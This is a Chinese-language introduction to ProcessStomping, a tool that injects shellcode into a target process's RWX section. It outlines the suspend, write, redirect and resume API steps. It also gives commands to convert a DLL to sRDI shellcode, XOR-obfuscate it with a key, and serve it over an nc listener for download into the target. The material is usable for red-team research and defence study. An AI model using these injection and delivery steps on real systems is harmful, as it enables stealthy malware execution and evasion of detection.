关于ProcessStomping

ProcessStomping是一款功能强大的Shellcode代码执行工具，该工具允许广大研究人员在目标可执行程序的指定字段部分执行Shellcode代码。

ProcessStomping实际上是Process Overwriting项目的一个升级版本，并且能够向目标应用程序的指定字段部分写入Shellcode Payload，而不是直接将整个PE Payload写入到目标进程的整个地址空间。

工具运行机制

下面给出的是ProcessStomping技术的主要运行步骤：

1、CreateProcess：给CREATE_SUSPENDED（0x00000004）设置Process Creation标记，以挂起目标进程的主线程；

2、WriteProcessMemory：用于向目标进程字段写入每一个恶意Shellcode；

3、SetThreadContext：用于将入口点指向一个新的代码字段（写入了Shellcode的字段）；

4、ResumeThread：恢复线程执行；

下图显示的是ProcessStomping如何向目标应用程序的RWX字段写入Shellcode：

工具安装

由于该工具基于Python开发，因此我们首先需要在本地设备上安装并配置好Python环境。接下来，广大研究人员可以直接使用下列命令将该项目源码克隆至本地：

git clone https://github.com/naksyn/ProcessStomping.git

工具使用

选择好你的目标进程，然后修改ProcessStomping.cpp中相应的全局变量。

然后编译sRDI项目，确保偏移量足够允许你跳转到生成的sRDI Shellcode代码块，然后运行下列命令更新sRDI工具：

cd ProcessStompingcd sRDI-masterpython .\lib\Python\EncodeBlobs.py .\

根据需要生成一个Reflective-Loaderless DLL Payload，然后生成sRDI Shellcode代码块：

python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

接下来，工具会使用一个键值对异或计算生成的Shellcode代码块，并通过一个简单的socket下载到目标设备上：

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

通过socket连接发送经过异或计算的Shellcode代码块：

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

sRDI代码块和其他非必要组件将会在Shellcode成功执行之后被删除。

工具运行截图

工具使用演示

演示视频：【点我观看】

项目地址

ProcessStomping：【GitHub传送门】

参考资料

Mockingjay revisisted - Process stomping and loading beacon with sRDI | Naksyn’s blog

GitHub - hasherezade/process_overwriting: Yet another variant of Process Hollowing

sRDI：一款通过Shellcode实现反射型DLL注入的强大工具 - FreeBuf网络安全行业门户